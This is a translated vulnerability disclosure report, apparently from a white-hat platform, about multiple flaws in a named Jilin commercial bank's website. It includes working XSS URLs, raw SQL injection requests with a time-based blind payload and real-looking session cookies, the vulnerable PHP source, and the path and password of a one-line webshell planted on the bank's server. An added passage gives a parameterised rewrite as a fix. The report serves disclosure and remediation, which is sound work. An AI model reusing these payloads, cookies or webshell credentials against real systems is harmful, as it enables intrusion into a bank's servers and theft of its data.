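2015-01-26: Details reported to the vendor; awaiting vendor handling
2015-01-29: Vendor confirmed; details disclosed to the vendor only
2015-02-08: Details disclosed to core white hats and experts in related fields
2015-02-18: Details disclosed to regular white hats
2015-02-28: Details disclosed to trainee white hats
2015-03-12: Details disclosed to the public
Multiple vulnerabilities at a commercial bank in Jilin, leading to compromise of the main site server
1. XSS
xss1: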
http://www.jtnsh.com/do/jsarticle.php?fid=45&iframeID=article_Newtopic_%3C/script%3E%3Cscript%3Eprompt%28943499%29%3C/script%3E&leng=28&rows=5&type=new
xss2:
http://www.jtnsh.com//member/homepage.php?uid=37_%3C/script%3E%3Cscript%3Eprompt%28935008%29%3C/script%3E
Sensitive information disclosure:
A:
http://www.jtnsh.com/map/wdcx.php
B:
http://jtnsh.com/map/map.php
Injection:
sql1: parameter: sheng
POST /map/map.php HTTP/1.1
Content-Length: 58
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.jtnsh.com:80/
Cookie: USR=rqvxglxn%090%091422240728%09http%3A%2F%2Fwww.jtnsh.com%2Fdo%2Flogin.php%3Ff; MIBEW_UserID=54c5a95f9dfd56.06927887; ECS_ID=6a1f8b22d14a3310bdf2ef4335481b37057ed5fa; ECS[visit_times]=1; ECS[history]=11%2C5%2C10; ECS[display]=grid; qq_fromurl=http%3A%2F%2Fwww.jtnsh.com%2Fdo%2Flogin.php; PHPSESSID=fompm8b3kphp3fpsg2bddrmc14
Host: www.jtnsh.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

sheng=1
<?php
include('public.php');
include('inc.php');
$sheng = $_POST['sheng'];
if(!$sheng) {
    echo 404;
} else {
    // $sheng is placed into the query string unescaped: this is the injection point
    $sql = "SELECT shi,xx,yy FROM `jt_form_content_9` WHERE shengfen='$sheng'";
    mysql_query("set names utf8",$conn);
    $res = mysql_query($sql,$conn);
    while(@$row = mysql_fetch_assoc(@$res)) {
        $data[]=$row;
    }
    $data = (remove_duplicate($data));
    echo JSON($data);
}
?>
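A hardened form of the map.php lookup above, as an added example that is not part of the original report or the site's own code. It assumes PDO with the MySQL driver, hypothetical DB_DSN / DB_USER / DB_PASS environment variables (the DSN carrying charset=utf8mb4 in place of "set names"), and a 64-byte cap on sheng; SELECT DISTINCT and json_encode() stand in for the page's remove_duplicate() and JSON() helpers.

```php
<?php
// Added example: parameterised rewrite of the sheng lookup.
// Assumptions (not from the page): PDO/MySQL, DB_DSN / DB_USER / DB_PASS
// environment variables, and the 64-byte input limit.

function lookup_branches(PDO $pdo, string $sheng): array
{
    // The value is bound as data, so quotes or SQL keywords inside $sheng
    // cannot change the structure of the statement.
    $stmt = $pdo->prepare(
        'SELECT DISTINCT shi, xx, yy FROM `jt_form_content_9` WHERE shengfen = :sheng'
    );
    $stmt->execute([':sheng' => $sheng]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$sheng = $_POST['sheng'] ?? '';

// Reject missing, non-string (for example sheng[]=x) or oversized input
// before touching the database, and answer with a real 404 status code
// instead of printing the text "404" in a 200 response.
if (!is_string($sheng) || $sheng === '' || strlen($sheng) > 64) {
    http_response_code(404);
    exit;
}

try {
    $pdo = new PDO(
        (string) getenv('DB_DSN'),
        (string) getenv('DB_USER'),
        (string) getenv('DB_PASS'),
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            // Use server-side prepared statements rather than client-side emulation.
            PDO::ATTR_EMULATE_PREPARES => false,
        ]
    );
    header('Content-Type: application/json; charset=utf-8');
    echo json_encode(lookup_branches($pdo, $sheng), JSON_UNESCAPED_UNICODE);
} catch (PDOException $e) {
    // Log the detail server-side; do not return database errors to the client.
    error_log('map.php lookup failed: ' . $e->getMessage());
    http_response_code(500);
}
```

The same binding approach applies to the gjz, leixing, sheng and shi parameters of wdcx.php.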
sql2: parameters: gjz, leixing, sheng, shi; all four parameters are injectable
POST /map/wdcx.php HTTP/1.1
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.jtnsh.com:80/
Cookie: USR=rqvxglxn%090%091422240728%09http%3A%2F%2Fwww.jtnsh.com%2Fdo%2Flogin.php%3Ff; MIBEW_UserID=54c5a95f9dfd56.06927887; ECS_ID=6a1f8b22d14a3310bdf2ef4335481b37057ed5fa; ECS[visit_times]=1; ECS[history]=11%2C5%2C10; ECS[display]=grid; qq_fromurl=http%3A%2F%2Fwww.jtnsh.com%2Fdo%2Flogin.php; PHPSESSID=fompm8b3kphp3fpsg2bddrmc14
Host: www.jtnsh.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

gjz=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&leixing=0&sheng=0&shi=0
Screenshots:
GETSHELL: one-line webshell: http://www.jtnsh.com/map/bma.php password: bma
Database:
Database backup file:
Logging in to the server:
Shown only to demonstrate the impact.
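Severity: High
Vulnerability Rank: 17
Confirmed at: 2015-01-29 15:20
CNVD confirmed and reproduced the reported vulnerabilities and has passed them through CNCERT to the Jilin branch center, which will coordinate follow-up handling with the organization that operates the site.
None at this time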